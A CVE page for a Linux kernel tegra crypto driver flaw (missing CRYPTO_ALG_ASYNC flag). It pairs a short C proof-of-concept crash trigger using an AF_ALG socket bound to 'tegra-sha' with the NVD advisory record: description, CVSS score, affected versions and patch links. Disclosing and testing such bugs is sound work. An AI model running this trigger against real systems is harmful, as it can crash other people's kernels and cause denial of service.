CVE-2026-31739

#include <stdio.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if_alg.h> // This PoC attempts to trigger the crash by sending a synchronous request // to a driver that is incorrectly marked as synchronous but is actually async. int main() { int tfmfd, opfd; struct sockaddr_alg sa = { .salg_family = AF_ALG, .salg_type = "hash", // or "skcipher" depending on driver implementation .salg_name = "tegra-sha" // Example algorithm name handled by tegra driver }; // 1. Create socket tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); if (tfmfd < 0) { perror("socket"); return 1; } // 2. Bind to the specific algorithm if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) { perror("bind"); close(tfmfd); return 1; } // 3. Accept a connection (request) // By default, this might trigger the sync path if the flag is missing opfd = accept(tfmfd, NULL, 0); if (opfd < 0) { perror("accept"); close(tfmfd); return 1; } // 4. Send data to process // Sending data forces the kernel to process the hash/cipher operation char buf[32] = "trigger_data"; if (send(opfd, buf, sizeof(buf), 0) < 0) { perror("send"); } printf("PoC executed. If vulnerable, the kernel may crash.\n"); close(opfd); close(tfmfd); return 0; }

{"cve": {"id": "CVE-2026-31739", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:36.600", "lastModified": "2026-05-07T19:00:05.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: tegra - Add missing CRYPTO_ALG_ASYNC\n\nThe tegra crypto driver failed to set the CRYPTO_ALG_ASYNC on its\nasynchronous algorithms, causing the crypto API to select them for users\nthat request only synchronous algorithms. This causes crashes (at\nleast). Fix this by adding the flag like what the other drivers do.\nAlso remove the unnecessary CRYPTO_ALG_TYPE_* flags, since those just\nget ignored and overridden by the registration function anyway."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.10", "versionEndExcluding": "6.12.81", "matchCriteriaId": "152F22C9-12F1-4E51-A98B-BC5F10DD76FD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3aea268b6d5cde3b087df9eeecc3bc620aa09513", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/429d05565eb19ee545d8a8395991372adbe4daf3", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4b56770d345524fc2acc143a2b85539cf7d74bc1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bdbf027a4504b4a86740de6beb6d18a957331839", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}